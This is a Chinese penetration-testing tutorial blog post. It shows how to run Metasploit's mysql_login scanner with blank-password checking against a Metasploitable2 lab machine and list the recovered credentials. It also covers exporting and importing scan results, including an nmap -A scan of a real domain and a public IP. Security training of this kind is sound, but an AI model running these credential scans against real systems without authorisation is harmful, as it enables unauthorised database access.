写点什么

网络安全 kali 渗透学习 web 渗透入门 使用 msf 扫描靶机上 mysql 服务的空密码

作者:学神来啦
  • 2022 年 3 月 02 日
  • 本文字数:2343 字

    阅读完需:约 8 分钟

实战-使用 msf 扫描靶机上 mysql 服务的空密码

我们启动一台 Metasploitable2-Linux 靶机网络模式为桥接 IP:192.168.1.180



登录 Metasploitable2-Linux 系统用户名 root,密码:123456 输入 ip a 查看 ip 地址



登录 Kali 开始搜索模块


msf6> search mysql_login
复制代码



加载模块


msf6 > use auxiliary/scanner/mysql/mysql_login
复制代码


查看模块配置项


msf6 auxiliary(scanner/mysql/mysql_login) > show options
复制代码



我们配置要爆破的用户


msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
复制代码


参数:BLANK_PASSWORDS 含意:Try blank passwords for all users #为所有用户尝试空密码 。 blank [blæŋk] 空白的


开启为所有用户尝试空密码


msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
复制代码


设置目标主机


msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.180
复制代码



配置完成以后我们执行 run 或者 exploit


msf6 auxiliary(scanner/mysql/mysql_login) > exploit
复制代码



执行成功


使用后端凭证命令 creds , 列出数据库中的所有凭据


Credentials   [krəˈdenʃlz]  凭证;证书;msf6 auxiliary(scanner/mysql/mysql_login) > creds
复制代码



以下有视频版还有文字版


不知道怎么操作的请看文字版的,里面详细的步骤。


关注公众号侠盗男爵回复【kali 系统】


视频版↓:


网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili


文字版↓:


年底了号主把我自己用到所有技术“做过的实战项目-内网实战靶场环境-渗透工具”还有很多渗透思维图谱!

将扫描的结果导出 Metasploit 与导入另一台机器的 Metasploit 中

数据库后端命令:


db_connect   连接到现有的数据库db_disconnect   断开与当前数据库实例的连接db_export   导出包含数据库内容的文件db_import   导入扫描结果文件(文件类型将被自动检测)
复制代码


例 1:将前面扫描 mysql 数据库空密码信息导出


msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml
复制代码


注:导出只支持两种格式:xml 和 pwdump 常用的导出格式为 xml



导出以后退出程序


msf6 auxiliary(scanner/mysql/mysql_login) > exit
复制代码


例 2:将扫描的结果导入另一台机器的 Metasploit 中我们就不再开一台新 Kali,直接重置数据库,当成新的来用


┌──(root💀xuegod53)-[~]└─# msfdb reinit      
复制代码


连接 Metasploit


└─# msfconsolemsf6 > hosts
复制代码



数据库中主机信息是空的,我们导入数据


msf6 > db_import /root/bak.xml
复制代码



msf6 > hosts
复制代码



hosts 命令有多个选项,通过 hosts -h 可以查看


msf6 > hosts -h
复制代码



在这里,最重要的是选项 -c,此选项使我们能够选择要用 hosts 命令显示的数据的列或字段(类似于 SQL 中的 select 命令)。在上图中可以看到显示的可用列。例:显示指定列的主机信息


msf6 > hosts -c address,name,os_name
复制代码



删除指定主机


msf6 > hosts -d 192.168.1.180
复制代码



除此之外我们还可以直接将 NMAP 的扫描结果导入到 Metasploit 数据库中我们新开一个终端窗口来进行扫描。


└─# nmap -A xuegod.cn -oX xuegod.xml -oX  将扫描信息导出到XML文件中
复制代码



我们回到 Metasploit 导入扫描结果


msf6 > db_import /root/xuegod.xml
复制代码



msf5 > hosts
复制代码



查看我们数据库中的主机都开放了哪些服务


msf5 > services
复制代码



显示指定主机的服务信息


msf5 > services  -R 101.200.128.35 
复制代码



扩展:在 msf 命令提示符下输入 help 后,显示的命令列表和作用描述。msf6 > help

核心命令

?   帮助菜单banner   显示一个metasploit横幅cd   更改当前的工作目录color   切换颜色connect   连接与主机通信exit   退出控制台get   获取特定于上下文的变量的值getg   获取全局变量的值grep grep另一个命令的输出  如: grep creds helphelp   帮助菜单history   显示命令历史irb   进入irb脚本模式load   加载一个框架插件quit   退出控制台route   通过会话路由流量save   保存活动的数据存储sessions    转储会话列表并显示有关会话的信息set   将特定于上下文的变量设置为一个值setg   将全局变量设置为一个值sleep   在指定的秒数内不做任何事情spool   将控制台输出写入文件以及屏幕threads   线程查看和操作后台线程unload   卸载框架插件unset   取消设置一个或多个特定于上下文的变量unsetg   取消设置一个或多个全局变量version   显示框架和控制台库版本号
复制代码

模块命令

advanced   显示一个或多个模块的高级选项back   从当前上下文返回edit   使用首选编辑器编辑当前模块info   显示有关一个或多个模块的信息loadpath   路径从路径搜索并加载模块options   显示全局选项或一个或多个模块popm   将最新的模块从堆栈中弹出并使其处于活动状态previous   将之前加载的模块设置为当前模块pushm   将活动或模块列表推入模块堆栈reload_all   从所有定义的模块路径重新加载所有模块search   搜索模块名称和描述show   显示给定类型的模块或所有模块use   按名称选择模块
复制代码

工作命令

handler   作为作业启动负载处理程序jobs   显示和管理作业kill   杀死一个工作rename_job   重命名作业
复制代码

资源脚本命令

makerc   保存从开始到文件输入的命令resource   运行存储在文件中的命令
复制代码

数据库后端命令

db_connect   连接到现有的数据库db_disconnect   断开与当前数据库实例的连接db_export   导出包含数据库内容的文件db_import   导入扫描结果文件(文件类型将被自动检测)db_nmap   执行nmap并自动记录输出db_rebuild_cache   重建数据库存储的模块高速缓存db_status   显示当前的数据库状态hosts   列出数据库中的所有主机loot   列出数据库中的所有战利品notes   列出数据库中的所有笔记services   列出数据库中的所有服务vulns   列出数据库中的所有漏洞workspace   在数据库工作区之间切换creds   列出数据库中的所有凭据
复制代码


需要配套视频的小伙伴可以滴滴我!



用户头像

学神来啦

关注

还未添加个人签名 2021.06.02 加入

10年Linux使用及管理经验,7年IT在线教育培训经验。精通Linux、Python、思科、C++、安全渗透等技术。曾任职国内知名互联网公司高级运维架构师、运维总监。对基于Linux下开源程序Openstack、Docker、K8S、DevOps、

评论

发布
暂无评论
网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码_网络安全_学神来啦_InfoQ写作平台